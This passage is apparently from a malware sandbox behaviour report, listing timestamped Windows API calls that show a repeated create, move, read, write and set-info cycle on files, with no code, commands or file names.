{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,304", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,314", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,335", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,335", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,345", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,345", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,385", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,415", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,585", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "filesystem", 